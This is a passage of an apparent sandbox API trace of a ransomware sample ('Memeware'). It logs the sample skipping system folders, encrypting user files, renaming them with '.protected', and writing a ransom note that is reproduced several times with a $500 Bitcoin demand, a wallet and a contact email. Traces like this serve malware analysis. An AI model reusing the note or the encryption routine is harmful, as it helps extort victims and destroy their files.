LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.961] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.962] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.962] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.962] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.962] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.962] CloseHandle (hObject=0xd8) returned 1 [0085.963] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Windows") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="Program Files (x86)") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="$Recycle.bin") returned 1 [0085.963] lstrcmpiW (lpString1="Windows Sidebar", lpString2="System Volume Information") returned 1 [0085.963] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 73 [0085.963] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0085.963] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0085.963] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned 75 [0085.963] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.963] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.963] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.964] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.964] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.964] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.964] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\.") returned 75 [0085.964] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.964] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.964] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.964] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.964] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.964] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.964] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.964] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\..") returned 76 [0085.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.964] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="Windows") returned -1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files") returned -1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="Program Files (x86)") returned -1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="$Recycle.bin") returned 1 [0085.964] lstrcmpiW (lpString1="Gadgets", lpString2="System Volume Information") returned -1 [0085.964] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 81 [0085.964] lstrcmpW (lpString1="Gadgets", lpString2=".") returned 1 [0085.964] lstrcmpW (lpString1="Gadgets", lpString2="..") returned 1 [0085.964] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned 83 [0085.964] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.965] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.965] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.965] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.965] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.965] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.965] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\.") returned 83 [0085.965] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.965] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.965] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.965] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.965] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.965] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.965] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.965] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\..") returned 84 [0085.965] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.965] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.965] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.965] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.965] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt") returned 99 [0085.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.966] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.966] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.967] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.967] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.967] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.967] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.967] CloseHandle (hObject=0x14c) returned 1 [0085.967] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="Windows") returned -1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files") returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="Program Files (x86)") returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="$Recycle.bin") returned 1 [0085.967] lstrcmpiW (lpString1="Settings.ini", lpString2="System Volume Information") returned -1 [0085.967] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.967] StrStrIW (lpFirst="Settings.ini", lpSrch=".protected") returned 0x0 [0085.967] lstrcmpW (lpString1="Settings.ini", lpString2="RESTORE_FILES.txt") returned 1 [0085.967] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.967] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.968] StrStrW (lpFirst="Settings.ini", lpSrch=".txt") returned 0x0 [0085.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.968] StrStrW (lpFirst="Settings.ini", lpSrch=".rar") returned 0x0 [0085.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 86 [0085.968] StrStrW (lpFirst="Settings.ini", lpSrch=".zip") returned 0x0 [0085.968] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x54, lpOverlapped=0x0) returned 1 [0085.969] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.969] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x54, lpOverlapped=0x0) returned 1 [0085.969] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.969] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.969] CloseHandle (hObject=0x14c) returned 1 [0085.970] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected") returned 96 [0085.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.protected")) returned 1 [0085.970] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.970] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.970] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt") returned 91 [0085.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Sidebar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows sidebar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.982] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.982] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.982] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.982] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.983] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.983] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.983] CloseHandle (hObject=0xd8) returned 1 [0085.983] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0085.983] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0085.983] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt") returned 75 [0085.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0085.984] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.984] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0085.984] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.984] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0085.984] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.984] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0085.985] CloseHandle (hObject=0xd4) returned 1 [0085.985] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="Windows") returned -1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files") returned -1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="Program Files (x86)") returned -1 [0085.985] lstrcmpiW (lpString1="Microsoft Help", lpString2="$Recycle.bin") returned 1 [0085.986] lstrcmpiW (lpString1="Microsoft Help", lpString2="System Volume Information") returned -1 [0085.986] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help") returned 62 [0085.986] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1 [0085.986] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1 [0085.986] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*") returned 64 [0085.986] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 